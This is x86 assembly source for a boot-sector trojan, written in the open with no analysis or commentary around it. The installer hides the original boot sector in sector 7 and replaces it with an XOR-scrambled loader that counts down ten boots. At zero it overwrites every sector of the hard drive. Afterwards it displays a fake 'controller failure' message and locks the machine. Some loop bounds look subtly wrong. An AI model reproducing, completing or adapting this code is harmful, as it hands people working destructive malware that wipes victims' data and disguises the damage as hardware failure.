.MODEL          TINY
.STACK          200H

HDDATA          EQU     01F0H
HDERROR         EQU     01F1H
HDPRECOMP       EQU     01F1H
HDSECTORS       EQU     01F2H
HDSECTOR        EQU     01F3H
HDCYLLOW        EQU     01F4H
HDCYLHIGH       EQU     01F5H
HDDRHEAD        EQU     01F6H
HDDCMD          EQU     01F7H
HDSTATUS        EQU     01F7H
STEALTH         EQU     08000H
READ            EQU     020H
WRITE           EQU     030H
ON              EQU     040H
OFF             EQU     0E0H
SLEEP           EQU     0E6H

.CODE

;INSTALLER
MOV AX,CS
MOV DS,AX
;SET UP DATA SEGMENT
MOV ES,AX
MOV DI,OFFSET SECTORDATA
MOV AX,0
MOV BX,0
MOV CL,1
MOV CH,1
MOV SI,READ
CALL HDRW
;READ IN THE OLD BOOT SECTOR
MOV DI,OFFSET SECTORDATA
ADD DI,401
CMP BYTE PTR[DI],';'
;LOOK FOR ";)" SIGNATURE
JNE SHORT NOSIG
CMP BYTE PTR[DI+1],')'    
JE SHORT EXIT
;IF WE'RE ALREADY INSTALLED,EXIT

NOSIG:

MOV AX,OFFSET SECTORDATA
MOV DI,AX
MOV AX,0
MOV BX,0
MOV CL,7
MOV CH,1
MOV SI,WRITE
CALL HDRW
;COPY THE BOOT SECTOR IN SECT 7
MOV DI,OFFSET SECTORDATA
MOV SI,OFFSET BOOTPROGRAM 
CLD
MOV CX,OFFSET BOOTPROGRAMEND - OFFSET BOOTPROGRAM
REP MOVSB
;COPY OUR PROGRAM INTO THE BOOT DATA
MOV CX,OFFSET BOOTPROGRAMEND - OFFSET START
MOV DI,OFFSET START - OFFSET BOOTPROGRAM
ADD SI,DI

ENCRYPTNEXTBYTE:

LODSB
XOR AL,'*'
STOSB
LOOP ENCRYPTNEXTBYTE
;SCRAMBLE PART OF THE TROJAN
MOV AX,OFFSET SECTORDATA
ADD AX,400
MOV DI,AX
MOV [DI],BYTE PTR 0AH
;COUNTER IN BOOT (10 TIMES)
MOV [DI+1],BYTE PTR ';'
MOV [DI+2],BYTE PTR ')'
;SIGNATURE IN BOOT
MOV AX,OFFSET SECTORDATA
MOV DI,AX
MOV AX,0
MOV BX,0
MOV CL,1
MOV CH,1
MOV SI,WRITE
CALL HDRW
;WRITE THE NEW BOOT SECTOR

EXIT:

MOV AH,4CH
INT 21H

;BOOT SECTOR PROGRAM

BOOTPROGRAM:
;THIS IS AT 0000:7C00H

CLD
;LOADER
MOV AX,CS
MOV DS,AX
MOV SI,OFFSET START - OFFSET BOOTPROGRAM + 7C00H
MOV CX,OFFSET BOOTPROGRAMEND - OFFSET START
MOV AX,8000H
MOV ES,AX
MOV DI,0

DECRYPTNEXTBYTE:

LODSB
XOR AL,'*'
STOSB
LOOP DECRYPTNEXTBYTE
;COPY OUR CODE TO 8000:0000
DB 0EAH,00H,00H,080H
;JUMP TO OUR CODE (JMP 8000:0000H)

START:

MOV AX,09000H
MOV DS,AX
MOV DI,0
MOV AX,0
MOV BX,0
MOV CL,1
MOV CH,1
MOV SI,READ
CALL HDRW
;READ IN OUR BOOT SECTOR
MOV BX,400
CMP BYTE PTR [BX],0
;HAS OUR COUNTER HIT 0 ALREADY?
JE ERRMESSAGE
;YES? SHOW ERROR MESSAGE
DEC BYTE PTR [BX]
;NO? THAT IS 1 LESS TIME...
MOV DI,0
MOV AX,0
MOV BX,0
MOV CL,1
MOV CH,1
MOV SI,WRITE
CALL HDRW
;SAVE THE NEW COUNTER
MOV BX,400
CMP BYTE PTR [BX],0
JE WIPEDRIVE
;WE JUST HIT 0? WIPEDRIVE
XOR AX,AX
MOV DS,AX
MOV AX,07C00H
MOV DI,AX
MOV AX,0
MOV BX,0
MOV CL,7
MOV CH,1
MOV SI,READ
CALL HDRW
;READ IN THE OLD BOOT SECTOR
DB 0EAH,00H,07CH,00H,00H
;JUMP TO OLD BOOT SECTOR @ 7C00H

ERRMESSAGE:

MOV CX,26
MOV SI,OFFSET ERRTEXT - OFFSET START
;SET START
MOV AX,CS
MOV DS,AX

OUTLOOP:

MOV AH,0EH
MOV AL,[SI]
INC SI
MOV BX,0007H
INT 10H
LOOP OUTLOOP
;SHOW THE ERROR MESSAGE
MOV DX,HDDCMD OR STEALTH
;SHUT THE HD UP
MOV AL,SLEEP
OUT DX,AL

LOCKUP:

JMP SHORT LOCKUP
;FREEZE UP THE SYSTEM

WIPEDRIVE:

MOV AH,08H
MOV DL,080H
INT 13H
;GET DRIVE PARAMETERS
INC DH
MOV MAXHEADS,DH
AND CL,01FH
INC CL
MOV MAXSECTS,CL
MOV BX,0
;BX = CUR CYLINDER
MOV CX,0101H
MOV AX,0100H

NEXTSECT:

MOV DI,2600H
MOV SI,WRITE
PUSH AX
PUSH CX
PUSH BX
CALL HDRW
CLI
POP BX
POP CX
POP AX
INC AH
CMP AH,MAXHEADS
JNE NEXTSECT
MOV AH,0
INC CL
CMP CL,MAXSECTS
JNE NEXTSECT
MOV CL,0
INC BX
JMP SHORT NEXTSECT

ERRTEXT:

DB 0AH,'HDD 0 CONTROLLER FAILER',07H
MAXHEADS DB (?)
MAXSECTS DB (?)

;HDWAIT
;
;WAITS FOR THE HARD DRIVE AND CONTROLLER TO FINISH
;IT'S CURRENT TASK BEFORE RETURNING

HDWAIT PROC NEAR

PUSH DX
PUSH AX

HDWAITLP:

MOV DX,HDSTATUS OR STEALTH
IN AL,DX
MOV AH,AL
AND AH,050H
JNE SHORT HDWAITLP
AND AL,080H
CMP AL,080H
JE SHORT HDWAITLP
POP AX
POP DX
RET
HDWAIT ENDP

;HDRW
;
;READS OR WRITES A BLOCK OF DATA TO OR FROM
;THE HARD DRIVE
;
;DI - BUFFER, AL, - DRIVE, AH - HEAD
;BX - CYLINDER, CL- SECTOR, CH - NUMSECTORS
;SI - READ/WRITE

HDRW PROC NEAR

CALL HDWAIT
CLI
;LEAVE ME ALONE, OTHER INTS!
SHR AL,4
OR AL,AH
OR AL,0A0H
MOV DX,HDDRHEAD OR STEALTH
OUT DX,AL
;SET UP DRIVE AND HEAD REGISTER
MOV DX,HDCYLLOW OR STEALTH
MOV AX,BX
OUT DX,AX
;SET UP THE CYLINDER REGISTERS
MOV DX,HDSECTOR OR STEALTH
MOV AL,CL
OUT DX,AL
;SET UP SECTOR REGISTER
MOV DX,HDSECTORS OR STEALTH
MOV AL,CH
OUT DX,AL
;# OF SECTORS TO TRANSFER
MOV DX,HDDCMD OR STEALTH
MOV AX,SI
OUT DX,AL
;READ/WRITE
CALL HDWAIT
MOV DX,HDSTATUS OR STEALTH

DRQ:

IN AL,DX
AND AL,08H
CMP AL,08H
JNE DRQ
;WAIT FOR DATA REQUEST
CMP SI,READ
JE READNEXTSECTOR

WRITENEXTSECTOR:
;WRITE 256 WORDS FOR 1 SECTOR

MOV BL,0FFH

WRITENEXTBYTE:

MOV DX,HDDATA OR STEALTH
MOV AX,[DI]
OUT DX,AX
ADD DI,2
DEC BL
CMP BL,0FH
JNZ SHORT WRITENEXTBYTE
DEC CH
JNZ SHORT WRITENEXTSECTOR
;LOOP TILL DONE WITH ALL SECTORS
JMP SHORT EXITRW

READNEXTSECTOR:

MOV BL,0FFH
;READ 256 WORDS FOR 1 SECTOR

READNEXTBYTE:

MOV DX,HDDATA OR STEALTH
IN AX,DX
MOV [DI],AX
ADD DI,2
DEC BL
CMP BL,0FFH
JNZ SHORT READNEXTBYTE
DEC CH
JNZ SHORT READNEXTSECTOR
;LOOP TILL DONE WITH ALL SECTORS

EXITRW:

STI
RET
HDRW ENDP

BOOTPROGRAMEND:

SECTORDATA DB 512 DUP (?)

END
